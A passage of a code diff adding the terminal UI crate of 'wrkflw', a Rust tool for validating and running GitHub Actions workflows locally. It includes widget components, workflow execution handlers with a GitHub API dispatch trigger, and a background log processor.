wrkflw_logging::warning(
|
||||
"Cannot trigger workflow while another operation is in progress",
|
||||
);
|
||||
} else if app.selected_tab != 0 {
|
||||
app.logs
|
||||
.push("Switch to Workflows tab to trigger a workflow".to_string());
|
||||
wrkflw_logging::warning(
|
||||
"Switch to Workflows tab to trigger a workflow",
|
||||
);
|
||||
// For better UX, we could also automatically switch to the Workflows tab here
|
||||
app.switch_tab(0);
|
||||
}
|
||||
}
|
||||
KeyCode::Char('s') => {
|
||||
if app.selected_tab == 2 {
|
||||
app.toggle_log_search();
|
||||
}
|
||||
}
|
||||
KeyCode::Char('f') => {
|
||||
if app.selected_tab == 2 {
|
||||
app.toggle_log_filter();
|
||||
}
|
||||
}
|
||||
KeyCode::Char('c') => {
|
||||
if app.selected_tab == 2 {
|
||||
app.clear_log_search_and_filter();
|
||||
}
|
||||
}
|
||||
KeyCode::Char(c) => {
|
||||
if app.selected_tab == 2 && app.log_search_active {
|
||||
app.handle_log_search_input(KeyCode::Char(c));
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
crates/ui/src/app/state.rs (new file, 1069 lines; diff suppressed because it is too large)
crates/ui/src/components/button.rs (new file, 53 lines)
@@ -0,0 +1,53 @@
|
||||
// Button component
|
||||
use ratatui::{
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::Paragraph,
|
||||
};
|
||||
|
||||
/// A simple button component for the TUI
|
||||
pub struct Button {
|
||||
pub label: String,
|
||||
pub is_selected: bool,
|
||||
pub is_active: bool,
|
||||
}
|
||||
|
||||
impl Button {
|
||||
/// Create a new button
|
||||
pub fn new(label: &str) -> Self {
|
||||
Button {
|
||||
label: label.to_string(),
|
||||
is_selected: false,
|
||||
is_active: true,
|
||||
}
|
||||
}
|
||||
|
||||
/// Set selected state
|
||||
pub fn selected(mut self, is_selected: bool) -> Self {
|
||||
self.is_selected = is_selected;
|
||||
self
|
||||
}
|
||||
|
||||
/// Set active state
|
||||
pub fn active(mut self, is_active: bool) -> Self {
|
||||
self.is_active = is_active;
|
||||
self
|
||||
}
|
||||
|
||||
/// Render the button
|
||||
pub fn render(&self) -> Paragraph<'_> {
|
||||
let (fg, bg) = match (self.is_selected, self.is_active) {
|
||||
(true, true) => (Color::Black, Color::Yellow),
|
||||
(true, false) => (Color::Black, Color::DarkGray),
|
||||
(false, true) => (Color::White, Color::Blue),
|
||||
(false, false) => (Color::DarkGray, Color::Black),
|
||||
};
|
||||
|
||||
let style = Style::default().fg(fg).bg(bg).add_modifier(Modifier::BOLD);
|
||||
|
||||
Paragraph::new(Line::from(vec![Span::styled(
|
||||
format!(" {} ", self.label),
|
||||
style,
|
||||
)]))
|
||||
}
|
||||
}
|
||||
crates/ui/src/components/checkbox.rs (new file, 60 lines)
@@ -0,0 +1,60 @@
|
||||
// Checkbox component
|
||||
use ratatui::{
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::Paragraph,
|
||||
};
|
||||
|
||||
/// A simple checkbox component for the TUI
|
||||
pub struct Checkbox {
|
||||
pub label: String,
|
||||
pub is_checked: bool,
|
||||
pub is_selected: bool,
|
||||
}
|
||||
|
||||
impl Checkbox {
|
||||
/// Create a new checkbox
|
||||
pub fn new(label: &str) -> Self {
|
||||
Checkbox {
|
||||
label: label.to_string(),
|
||||
is_checked: false,
|
||||
is_selected: false,
|
||||
}
|
||||
}
|
||||
|
||||
/// Set checked state
|
||||
pub fn checked(mut self, is_checked: bool) -> Self {
|
||||
self.is_checked = is_checked;
|
||||
self
|
||||
}
|
||||
|
||||
/// Set selected state
|
||||
pub fn selected(mut self, is_selected: bool) -> Self {
|
||||
self.is_selected = is_selected;
|
||||
self
|
||||
}
|
||||
|
||||
/// Toggle checked state
|
||||
pub fn toggle(&mut self) {
|
||||
self.is_checked = !self.is_checked;
|
||||
}
|
||||
|
||||
/// Render the checkbox
|
||||
pub fn render(&self) -> Paragraph<'_> {
|
||||
let checkbox = if self.is_checked { "[✓]" } else { "[ ]" };
|
||||
|
||||
let style = if self.is_selected {
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD)
|
||||
} else {
|
||||
Style::default().fg(Color::White)
|
||||
};
|
||||
|
||||
Paragraph::new(Line::from(vec![
|
||||
Span::styled(checkbox, style),
|
||||
Span::raw(" "),
|
||||
Span::styled(&self.label, style),
|
||||
]))
|
||||
}
|
||||
}
|
||||
crates/ui/src/components/mod.rs (new file, 12 lines)
@@ -0,0 +1,12 @@
// UI Components
mod button;
mod checkbox;
mod progress_bar;

// Re-export components for easier access
pub use button::Button;
pub use checkbox::Checkbox;
pub use progress_bar::ProgressBar;

// This module will contain smaller reusable UI elements that
// can be shared between different views of the application.
crates/ui/src/components/progress_bar.rs (new file, 53 lines)
@@ -0,0 +1,53 @@
|
||||
// Progress bar component
|
||||
use ratatui::{
|
||||
style::{Color, Style},
|
||||
widgets::Gauge,
|
||||
};
|
||||
|
||||
/// A simple progress bar component for the TUI
|
||||
pub struct ProgressBar {
|
||||
pub progress: f64,
|
||||
pub label: Option<String>,
|
||||
pub color: Color,
|
||||
}
|
||||
|
||||
impl ProgressBar {
|
||||
/// Create a new progress bar
|
||||
pub fn new(progress: f64) -> Self {
|
||||
ProgressBar {
|
||||
progress: progress.clamp(0.0, 1.0),
|
||||
label: None,
|
||||
color: Color::Blue,
|
||||
}
|
||||
}
|
||||
|
||||
/// Set label
|
||||
pub fn label(mut self, label: &str) -> Self {
|
||||
self.label = Some(label.to_string());
|
||||
self
|
||||
}
|
||||
|
||||
/// Set color
|
||||
pub fn color(mut self, color: Color) -> Self {
|
||||
self.color = color;
|
||||
self
|
||||
}
|
||||
|
||||
/// Update progress value
|
||||
pub fn update(&mut self, progress: f64) {
|
||||
self.progress = progress.clamp(0.0, 1.0);
|
||||
}
|
||||
|
||||
/// Render the progress bar
|
||||
pub fn render(&self) -> Gauge<'_> {
|
||||
let label = match &self.label {
|
||||
Some(lbl) => format!("{} {:.0}%", lbl, self.progress * 100.0),
|
||||
None => format!("{:.0}%", self.progress * 100.0),
|
||||
};
|
||||
|
||||
Gauge::default()
|
||||
.gauge_style(Style::default().fg(self.color).bg(Color::Black))
|
||||
.label(label)
|
||||
.ratio(self.progress)
|
||||
}
|
||||
}
|
||||
crates/ui/src/handlers/mod.rs (new file, 3 lines)
@@ -0,0 +1,3 @@
// Handlers for the UI

pub mod workflow;
crates/ui/src/handlers/workflow.rs (new file, 567 lines)
@@ -0,0 +1,567 @@
|
||||
// Workflow handlers
|
||||
use crate::app::App;
|
||||
use crate::models::{ExecutionResultMsg, WorkflowExecution, WorkflowStatus};
|
||||
use chrono::Local;
|
||||
use std::io;
|
||||
use std::path::{Path, PathBuf};
|
||||
use std::sync::mpsc;
|
||||
use std::thread;
|
||||
use wrkflw_evaluator::evaluate_workflow_file;
|
||||
use wrkflw_executor::{self, JobStatus, RuntimeType, StepStatus};
|
||||
|
||||
// Validate a workflow or directory containing workflows
|
||||
pub fn validate_workflow(path: &Path, verbose: bool) -> io::Result<()> {
|
||||
let mut workflows = Vec::new();
|
||||
|
||||
if path.is_dir() {
|
||||
let entries = std::fs::read_dir(path)?;
|
||||
|
||||
for entry in entries {
|
||||
let entry = entry?;
|
||||
let entry_path = entry.path();
|
||||
|
||||
if entry_path.is_file() && wrkflw_utils::is_workflow_file(&entry_path) {
|
||||
workflows.push(entry_path);
|
||||
}
|
||||
}
|
||||
} else if path.is_file() {
|
||||
workflows.push(PathBuf::from(path));
|
||||
} else {
|
||||
return Err(io::Error::new(
|
||||
io::ErrorKind::NotFound,
|
||||
format!("Path does not exist: {}", path.display()),
|
||||
));
|
||||
}
|
||||
|
||||
let mut valid_count = 0;
|
||||
let mut invalid_count = 0;
|
||||
|
||||
println!("Validating {} workflow file(s)...", workflows.len());
|
||||
|
||||
for workflow_path in workflows {
|
||||
match evaluate_workflow_file(&workflow_path, verbose) {
|
||||
Ok(result) => {
|
||||
if result.is_valid {
|
||||
println!("✅ Valid: {}", workflow_path.display());
|
||||
valid_count += 1;
|
||||
} else {
|
||||
println!("❌ Invalid: {}", workflow_path.display());
|
||||
for (i, issue) in result.issues.iter().enumerate() {
|
||||
println!(" {}. {}", i + 1, issue);
|
||||
}
|
||||
invalid_count += 1;
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("❌ Error processing {}: {}", workflow_path.display(), e);
|
||||
invalid_count += 1;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
println!(
|
||||
"\nSummary: {} valid, {} invalid",
|
||||
valid_count, invalid_count
|
||||
);
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
// Execute a workflow through the CLI
|
||||
pub async fn execute_workflow_cli(
|
||||
path: &Path,
|
||||
runtime_type: RuntimeType,
|
||||
verbose: bool,
|
||||
) -> io::Result<()> {
|
||||
if !path.exists() {
|
||||
return Err(io::Error::new(
|
||||
io::ErrorKind::NotFound,
|
||||
format!("Workflow file does not exist: {}", path.display()),
|
||||
));
|
||||
}
|
||||
|
||||
println!("Validating workflow...");
|
||||
match evaluate_workflow_file(path, false) {
|
||||
Ok(result) => {
|
||||
if !result.is_valid {
|
||||
println!("❌ Cannot execute invalid workflow: {}", path.display());
|
||||
for (i, issue) in result.issues.iter().enumerate() {
|
||||
println!(" {}. {}", i + 1, issue);
|
||||
}
|
||||
return Err(io::Error::new(
|
||||
io::ErrorKind::InvalidData,
|
||||
"Workflow validation failed",
|
||||
));
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
return Err(io::Error::other(format!(
|
||||
"Error validating workflow: {}",
|
||||
e
|
||||
)));
|
||||
}
|
||||
}
|
||||
|
||||
// Check container runtime availability if container runtime is selected
|
||||
let runtime_type = match runtime_type {
|
||||
RuntimeType::Docker => {
|
||||
if !wrkflw_executor::docker::is_available() {
|
||||
println!("⚠️ Docker is not available. Using emulation mode instead.");
|
||||
wrkflw_logging::warning("Docker is not available. Using emulation mode instead.");
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
RuntimeType::Docker
|
||||
}
|
||||
}
|
||||
RuntimeType::Podman => {
|
||||
if !wrkflw_executor::podman::is_available() {
|
||||
println!("⚠️ Podman is not available. Using emulation mode instead.");
|
||||
wrkflw_logging::warning("Podman is not available. Using emulation mode instead.");
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
RuntimeType::Podman
|
||||
}
|
||||
}
|
||||
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
|
||||
RuntimeType::Emulation => RuntimeType::Emulation,
|
||||
};
|
||||
|
||||
println!("Executing workflow: {}", path.display());
|
||||
println!("Runtime mode: {:?}", runtime_type);
|
||||
|
||||
// Log the start of the execution in debug mode with more details
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Starting workflow execution: path={}, runtime={:?}, verbose={}",
|
||||
path.display(),
|
||||
runtime_type,
|
||||
verbose
|
||||
));
|
||||
|
||||
let config = wrkflw_executor::ExecutionConfig {
|
||||
runtime_type,
|
||||
verbose,
|
||||
preserve_containers_on_failure: false, // Default for this path
|
||||
};
|
||||
|
||||
match wrkflw_executor::execute_workflow(path, config).await {
|
||||
Ok(result) => {
|
||||
println!("\nWorkflow execution results:");
|
||||
|
||||
// Track if the workflow had any failures
|
||||
let mut any_job_failed = false;
|
||||
|
||||
for job in &result.jobs {
|
||||
match job.status {
|
||||
JobStatus::Success => {
|
||||
println!("\n✅ Job succeeded: {}", job.name);
|
||||
}
|
||||
JobStatus::Failure => {
|
||||
println!("\n❌ Job failed: {}", job.name);
|
||||
any_job_failed = true;
|
||||
}
|
||||
JobStatus::Skipped => {
|
||||
println!("\n⏭️ Job skipped: {}", job.name);
|
||||
}
|
||||
}
|
||||
|
||||
println!("-------------------------");
|
||||
|
||||
// Log the job details for debug purposes
|
||||
wrkflw_logging::debug(&format!("Job: {}, Status: {:?}", job.name, job.status));
|
||||
|
||||
for step in job.steps.iter() {
|
||||
match step.status {
|
||||
StepStatus::Success => {
|
||||
println!(" ✅ {}", step.name);
|
||||
|
||||
// Check if this is a GitHub action output that should be hidden
|
||||
let should_hide = std::env::var("WRKFLW_HIDE_ACTION_MESSAGES")
|
||||
.map(|val| val == "true")
|
||||
.unwrap_or(false)
|
||||
&& step.output.contains("Would execute GitHub action:");
|
||||
|
||||
// Only show output if not hidden and it's short
|
||||
if !should_hide
|
||||
&& !step.output.trim().is_empty()
|
||||
&& step.output.lines().count() <= 3
|
||||
{
|
||||
// For short outputs, show directly
|
||||
println!(" {}", step.output.trim());
|
||||
}
|
||||
}
|
||||
StepStatus::Failure => {
|
||||
println!(" ❌ {}", step.name);
|
||||
|
||||
// Ensure we capture and show exit code
|
||||
if let Some(exit_code) = step
|
||||
.output
|
||||
.lines()
|
||||
.find(|line| line.trim().starts_with("Exit code:"))
|
||||
.map(|line| line.trim().to_string())
|
||||
{
|
||||
println!(" {}", exit_code);
|
||||
}
|
||||
|
||||
// Show command/run details in debug mode
|
||||
if wrkflw_logging::get_log_level() <= wrkflw_logging::LogLevel::Debug {
|
||||
if let Some(cmd_output) = step
|
||||
.output
|
||||
.lines()
|
||||
.skip_while(|l| !l.trim().starts_with("$"))
|
||||
.take(1)
|
||||
.next()
|
||||
{
|
||||
println!(" Command: {}", cmd_output.trim());
|
||||
}
|
||||
}
|
||||
|
||||
// Always show error output from failed steps, but keep it to a reasonable length
|
||||
let output_lines: Vec<&str> = step
|
||||
.output
|
||||
.lines()
|
||||
.filter(|line| !line.trim().starts_with("Exit code:"))
|
||||
.collect();
|
||||
|
||||
if !output_lines.is_empty() {
|
||||
println!(" Error output:");
|
||||
for line in output_lines.iter().take(10) {
|
||||
println!(" {}", line.trim().replace('\n', "\n "));
|
||||
}
|
||||
|
||||
if output_lines.len() > 10 {
|
||||
println!(
|
||||
" ... (and {} more lines)",
|
||||
output_lines.len() - 10
|
||||
);
|
||||
println!(" Use --debug to see full output");
|
||||
}
|
||||
}
|
||||
}
|
||||
StepStatus::Skipped => {
|
||||
println!(" ⏭️ {} (skipped)", step.name);
|
||||
}
|
||||
}
|
||||
|
||||
// Always log the step details for debug purposes
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Step: {}, Status: {:?}, Output length: {} lines",
|
||||
step.name,
|
||||
step.status,
|
||||
step.output.lines().count()
|
||||
));
|
||||
|
||||
// In debug mode, log all step output
|
||||
if wrkflw_logging::get_log_level() == wrkflw_logging::LogLevel::Debug
|
||||
&& !step.output.trim().is_empty()
|
||||
{
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Step output for '{}': \n{}",
|
||||
step.name, step.output
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if any_job_failed {
|
||||
println!("\n❌ Workflow completed with failures");
|
||||
// In the case of failure, we'll also inform the user about the debug option
|
||||
// if they're not already using it
|
||||
if wrkflw_logging::get_log_level() > wrkflw_logging::LogLevel::Debug {
|
||||
println!(" Run with --debug for more detailed output");
|
||||
}
|
||||
} else {
|
||||
println!("\n✅ Workflow completed successfully!");
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
Err(e) => {
|
||||
println!("❌ Failed to execute workflow: {}", e);
|
||||
wrkflw_logging::error(&format!("Failed to execute workflow: {}", e));
|
||||
Err(io::Error::other(e))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Helper function to execute workflow trigger using curl
|
||||
pub async fn execute_curl_trigger(
|
||||
workflow_name: &str,
|
||||
branch: Option<&str>,
|
||||
) -> Result<(Vec<wrkflw_executor::JobResult>, ()), String> {
|
||||
// Get GitHub token
|
||||
let token = std::env::var("GITHUB_TOKEN").map_err(|_| {
|
||||
"GitHub token not found. Please set GITHUB_TOKEN environment variable".to_string()
|
||||
})?;
|
||||
|
||||
// Debug log to check if GITHUB_TOKEN is set
|
||||
match std::env::var("GITHUB_TOKEN") {
|
||||
Ok(token) => wrkflw_logging::info(&format!("GITHUB_TOKEN is set: {}", &token[..5])), // Log first 5 characters for security
|
||||
Err(_) => wrkflw_logging::error("GITHUB_TOKEN is not set"),
|
||||
}
|
||||
|
||||
// Get repository information
|
||||
let repo_info = wrkflw_github::get_repo_info()
|
||||
.map_err(|e| format!("Failed to get repository info: {}", e))?;
|
||||
|
||||
// Determine branch to use
|
||||
let branch_ref = branch.unwrap_or(&repo_info.default_branch);
|
||||
|
||||
// Extract just the workflow name from the path if it's a full path
|
||||
let workflow_name = if workflow_name.contains('/') {
|
||||
Path::new(workflow_name)
|
||||
.file_stem()
|
||||
.and_then(|s| s.to_str())
|
||||
.ok_or_else(|| "Invalid workflow name".to_string())?
|
||||
} else {
|
||||
workflow_name
|
||||
};
|
||||
|
||||
wrkflw_logging::info(&format!("Using workflow name: {}", workflow_name));
|
||||
|
||||
// Construct JSON payload
|
||||
let payload = serde_json::json!({
|
||||
"ref": branch_ref
|
||||
});
|
||||
|
||||
// Construct API URL
|
||||
let url = format!(
|
||||
"https://api.github.com/repos/{}/{}/actions/workflows/{}.yml/dispatches",
|
||||
repo_info.owner, repo_info.repo, workflow_name
|
||||
);
|
||||
|
||||
wrkflw_logging::info(&format!("Triggering workflow at URL: {}", url));
|
||||
|
||||
// Create a reqwest client
|
||||
let client = reqwest::Client::new();
|
||||
|
||||
// Send the request using reqwest
|
||||
let response = client
|
||||
.post(&url)
|
||||
.header("Authorization", format!("Bearer {}", token.trim()))
|
||||
.header("Accept", "application/vnd.github.v3+json")
|
||||
.header("Content-Type", "application/json")
|
||||
.header("User-Agent", "wrkflw-cli")
|
||||
.json(&payload)
|
||||
.send()
|
||||
.await
|
||||
.map_err(|e| format!("Failed to send request: {}", e))?;
|
||||
|
||||
if !response.status().is_success() {
|
||||
let status = response.status().as_u16();
|
||||
let error_message = response
|
||||
.text()
|
||||
.await
|
||||
.unwrap_or_else(|_| format!("Unknown error (HTTP {})", status));
|
||||
|
||||
return Err(format!("API error: {} - {}", status, error_message));
|
||||
}
|
||||
|
||||
// Success message with URL to view the workflow
|
||||
let success_msg = format!(
|
||||
"Workflow triggered successfully. View it at: https://github.com/{}/{}/actions/workflows/{}.yml",
|
||||
repo_info.owner, repo_info.repo, workflow_name
|
||||
);
|
||||
|
||||
// Create a job result structure
|
||||
let job_result = wrkflw_executor::JobResult {
|
||||
name: "GitHub Trigger".to_string(),
|
||||
status: wrkflw_executor::JobStatus::Success,
|
||||
steps: vec![wrkflw_executor::StepResult {
|
||||
name: "Remote Trigger".to_string(),
|
||||
status: wrkflw_executor::StepStatus::Success,
|
||||
output: success_msg,
|
||||
}],
|
||||
logs: "Workflow triggered remotely on GitHub".to_string(),
|
||||
};
|
||||
|
||||
Ok((vec![job_result], ()))
|
||||
}
|
||||
|
||||
// Extract common workflow execution logic to avoid duplication
|
||||
pub fn start_next_workflow_execution(
|
||||
app: &mut App,
|
||||
tx_clone: &mpsc::Sender<ExecutionResultMsg>,
|
||||
verbose: bool,
|
||||
) {
|
||||
if let Some(next_idx) = app.get_next_workflow_to_execute() {
|
||||
app.current_execution = Some(next_idx);
|
||||
let tx_clone_inner = tx_clone.clone();
|
||||
let workflow_path = app.workflows[next_idx].path.clone();
|
||||
|
||||
// Log whether verbose mode is enabled
|
||||
if verbose {
|
||||
app.logs
|
||||
.push("Verbose mode: Step outputs will be displayed in full".to_string());
|
||||
wrkflw_logging::info("Verbose mode: Step outputs will be displayed in full");
|
||||
} else {
|
||||
app.logs.push(
|
||||
"Standard mode: Only step status will be shown (use --verbose for full output)"
|
||||
.to_string(),
|
||||
);
|
||||
wrkflw_logging::info(
|
||||
"Standard mode: Only step status will be shown (use --verbose for full output)",
|
||||
);
|
||||
}
|
||||
|
||||
// Check container runtime availability again if container runtime is selected
|
||||
let runtime_type = match app.runtime_type {
|
||||
RuntimeType::Docker => {
|
||||
// Use safe FD redirection to check Docker availability
|
||||
let is_docker_available = match wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::docker::is_available,
|
||||
) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Docker availability.",
|
||||
);
|
||||
false
|
||||
}
|
||||
};
|
||||
|
||||
if !is_docker_available {
|
||||
app.logs
|
||||
.push("Docker is not available. Using emulation mode instead.".to_string());
|
||||
wrkflw_logging::warning(
|
||||
"Docker is not available. Using emulation mode instead.",
|
||||
);
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
RuntimeType::Docker
|
||||
}
|
||||
}
|
||||
RuntimeType::Podman => {
|
||||
// Use safe FD redirection to check Podman availability
|
||||
let is_podman_available = match wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::podman::is_available,
|
||||
) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Podman availability.",
|
||||
);
|
||||
false
|
||||
}
|
||||
};
|
||||
|
||||
if !is_podman_available {
|
||||
app.logs
|
||||
.push("Podman is not available. Using emulation mode instead.".to_string());
|
||||
wrkflw_logging::warning(
|
||||
"Podman is not available. Using emulation mode instead.",
|
||||
);
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
RuntimeType::Podman
|
||||
}
|
||||
}
|
||||
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
|
||||
RuntimeType::Emulation => RuntimeType::Emulation,
|
||||
};
|
||||
|
||||
let validation_mode = app.validation_mode;
|
||||
let preserve_containers_on_failure = app.preserve_containers_on_failure;
|
||||
|
||||
// Update workflow status and add execution details
|
||||
app.workflows[next_idx].status = WorkflowStatus::Running;
|
||||
|
||||
// Initialize execution details if not already done
|
||||
if app.workflows[next_idx].execution_details.is_none() {
|
||||
app.workflows[next_idx].execution_details = Some(WorkflowExecution {
|
||||
jobs: Vec::new(),
|
||||
start_time: Local::now(),
|
||||
end_time: None,
|
||||
logs: Vec::new(),
|
||||
progress: 0.0,
|
||||
});
|
||||
}
|
||||
|
||||
thread::spawn(move || {
|
||||
let rt = match tokio::runtime::Runtime::new() {
|
||||
Ok(runtime) => runtime,
|
||||
Err(e) => {
|
||||
let _ = tx_clone_inner.send((
|
||||
next_idx,
|
||||
Err(format!("Failed to create Tokio runtime: {}", e)),
|
||||
));
|
||||
return;
|
||||
}
|
||||
};
|
||||
|
||||
let result = rt.block_on(async {
|
||||
if validation_mode {
|
||||
// Perform validation instead of execution
|
||||
match evaluate_workflow_file(&workflow_path, verbose) {
|
||||
Ok(validation_result) => {
|
||||
// Create execution result based on validation
|
||||
let status = if validation_result.is_valid {
|
||||
wrkflw_executor::JobStatus::Success
|
||||
} else {
|
||||
wrkflw_executor::JobStatus::Failure
|
||||
};
|
||||
|
||||
// Create a synthetic job result for validation
|
||||
let jobs = vec![wrkflw_executor::JobResult {
|
||||
name: "Validation".to_string(),
|
||||
status,
|
||||
steps: vec![wrkflw_executor::StepResult {
|
||||
name: "Validator".to_string(),
|
||||
status: if validation_result.is_valid {
|
||||
wrkflw_executor::StepStatus::Success
|
||||
} else {
|
||||
wrkflw_executor::StepStatus::Failure
|
||||
},
|
||||
output: validation_result.issues.join("\n"),
|
||||
}],
|
||||
logs: format!(
|
||||
"Validation result: {}",
|
||||
if validation_result.is_valid {
|
||||
"PASSED"
|
||||
} else {
|
||||
"FAILED"
|
||||
}
|
||||
),
|
||||
}];
|
||||
|
||||
Ok((jobs, ()))
|
||||
}
|
||||
Err(e) => Err(e.to_string()),
|
||||
}
|
||||
} else {
|
||||
// Use safe FD redirection for execution
|
||||
let config = wrkflw_executor::ExecutionConfig {
|
||||
runtime_type,
|
||||
verbose,
|
||||
preserve_containers_on_failure,
|
||||
};
|
||||
|
||||
let execution_result = wrkflw_utils::fd::with_stderr_to_null(|| {
|
||||
futures::executor::block_on(async {
|
||||
wrkflw_executor::execute_workflow(&workflow_path, config).await
|
||||
})
|
||||
})
|
||||
.map_err(|e| format!("Failed to redirect stderr during execution: {}", e))?;
|
||||
|
||||
match execution_result {
|
||||
Ok(execution_result) => {
|
||||
// Send back the job results in a wrapped result
|
||||
Ok((execution_result.jobs, ()))
|
||||
}
|
||||
Err(e) => Err(e.to_string()),
|
||||
}
|
||||
}
|
||||
});
|
||||
|
||||
// Only send if we get a valid result
|
||||
if let Err(e) = tx_clone_inner.send((next_idx, result)) {
|
||||
wrkflw_logging::error(&format!("Error sending execution result: {}", e));
|
||||
}
|
||||
});
|
||||
} else {
|
||||
app.running = false;
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
app.logs
|
||||
.push(format!("[{}] All workflows completed execution", timestamp));
|
||||
wrkflw_logging::info("All workflows completed execution");
|
||||
}
|
||||
}
|
||||
23 crates/ui/src/lib.rs (Normal file)
@@ -0,0 +1,23 @@
// Modular UI crate for wrkflw
//
// This crate is organized into several modules:
// - app: Contains the main App state and TUI entry point
// - models: Contains the data structures for the UI
// - components: Contains reusable UI elements
// - handlers: Contains workflow handling logic
// - utils: Contains utility functions
// - views: Contains UI rendering code

// Re-export public modules
pub mod app;
pub mod components;
pub mod handlers;
pub mod log_processor;
pub mod models;
pub mod utils;
pub mod views;

// Re-export main entry points
pub use app::run_wrkflw_tui;
pub use handlers::workflow::execute_workflow_cli;
pub use handlers::workflow::validate_workflow;
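The re-exports above are the crate's public surface. As a rough sketch of a call site for `execute_workflow_cli` (whose signature appears earlier in this diff), with the caveat that the consuming crate name `wrkflw_ui`, the `wrkflw_executor::RuntimeType` import path, the tokio entry point, and the workflow filename are all assumptions made for illustration:

```rust
// Hypothetical consumer; every name flagged in the lead-in is illustrative.
use std::path::Path;
use wrkflw_executor::RuntimeType; // assumed import path
use wrkflw_ui::execute_workflow_cli; // assumed crate name for crates/ui

#[tokio::main]
async fn main() -> std::io::Result<()> {
    // Validates the file first, then runs it; falls back to emulation when the
    // selected container runtime is unavailable (see execute_workflow_cli above).
    execute_workflow_cli(
        Path::new(".github/workflows/ci.yml"), // hypothetical workflow file
        RuntimeType::Emulation,
        true, // verbose
    )
    .await
}
```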
305 crates/ui/src/log_processor.rs (Normal file)
@@ -0,0 +1,305 @@
// Background log processor for asynchronous log filtering and formatting
use crate::models::LogFilterLevel;
use ratatui::{
    style::{Color, Style},
    text::{Line, Span},
    widgets::{Cell, Row},
};
use std::sync::mpsc;
use std::thread;
use std::time::{Duration, Instant};

/// Processed log entry ready for rendering
#[derive(Debug, Clone)]
pub struct ProcessedLogEntry {
    pub timestamp: String,
    pub log_type: String,
    pub log_style: Style,
    pub content_spans: Vec<Span<'static>>,
}

impl ProcessedLogEntry {
    /// Convert to a table row for rendering
    pub fn to_row(&self) -> Row<'static> {
        Row::new(vec![
            Cell::from(self.timestamp.clone()),
            Cell::from(self.log_type.clone()).style(self.log_style),
            Cell::from(Line::from(self.content_spans.clone())),
        ])
    }
}

/// Request to update log processing parameters
#[derive(Debug, Clone)]
pub struct LogProcessingRequest {
    pub search_query: String,
    pub filter_level: Option<LogFilterLevel>,
    pub app_logs: Vec<String>, // Complete app logs
    pub app_logs_count: usize, // To detect changes in app logs
    pub system_logs_count: usize, // To detect changes in system logs
}

/// Response with processed logs
#[derive(Debug, Clone)]
pub struct LogProcessingResponse {
    pub processed_logs: Vec<ProcessedLogEntry>,
    pub total_log_count: usize,
    pub filtered_count: usize,
    pub search_matches: Vec<usize>, // Indices of logs that match search
}

/// Background log processor
pub struct LogProcessor {
    request_tx: mpsc::Sender<LogProcessingRequest>,
    response_rx: mpsc::Receiver<LogProcessingResponse>,
    _worker_handle: thread::JoinHandle<()>,
}

impl LogProcessor {
    /// Create a new log processor with a background worker thread
    pub fn new() -> Self {
        let (request_tx, request_rx) = mpsc::channel::<LogProcessingRequest>();
        let (response_tx, response_rx) = mpsc::channel::<LogProcessingResponse>();

        let worker_handle = thread::spawn(move || {
            Self::worker_loop(request_rx, response_tx);
        });

        Self {
            request_tx,
            response_rx,
            _worker_handle: worker_handle,
        }
    }

    /// Send a processing request (non-blocking)
    pub fn request_update(
        &self,
        request: LogProcessingRequest,
    ) -> Result<(), mpsc::SendError<LogProcessingRequest>> {
        self.request_tx.send(request)
    }

    /// Try to get the latest processed logs (non-blocking)
    pub fn try_get_update(&self) -> Option<LogProcessingResponse> {
        self.response_rx.try_recv().ok()
    }

    /// Background worker loop
    fn worker_loop(
        request_rx: mpsc::Receiver<LogProcessingRequest>,
        response_tx: mpsc::Sender<LogProcessingResponse>,
    ) {
        let mut last_request: Option<LogProcessingRequest> = None;
        let mut last_processed_time = Instant::now();
        let mut cached_logs: Vec<String> = Vec::new();
        let mut cached_app_logs_count = 0;
        let mut cached_system_logs_count = 0;

        loop {
            // Check for new requests with a timeout to allow periodic processing
            let request = match request_rx.recv_timeout(Duration::from_millis(100)) {
                Ok(req) => Some(req),
                Err(mpsc::RecvTimeoutError::Timeout) => None,
                Err(mpsc::RecvTimeoutError::Disconnected) => break,
            };

            // Update request if we received one
            if let Some(req) = request {
                last_request = Some(req);
            }

            // Process if we have a request and enough time has passed since last processing
            if let Some(ref req) = last_request {
                let should_process = last_processed_time.elapsed() > Duration::from_millis(50)
                    && (cached_app_logs_count != req.app_logs_count
                        || cached_system_logs_count != req.system_logs_count
                        || cached_logs.is_empty());

                if should_process {
                    // Refresh log cache if log counts changed
                    if cached_app_logs_count != req.app_logs_count
                        || cached_system_logs_count != req.system_logs_count
                        || cached_logs.is_empty()
                    {
                        cached_logs = Self::get_combined_logs(&req.app_logs);
                        cached_app_logs_count = req.app_logs_count;
                        cached_system_logs_count = req.system_logs_count;
                    }

                    let response = Self::process_logs(&cached_logs, req);

                    if response_tx.send(response).is_err() {
                        break; // Receiver disconnected
                    }

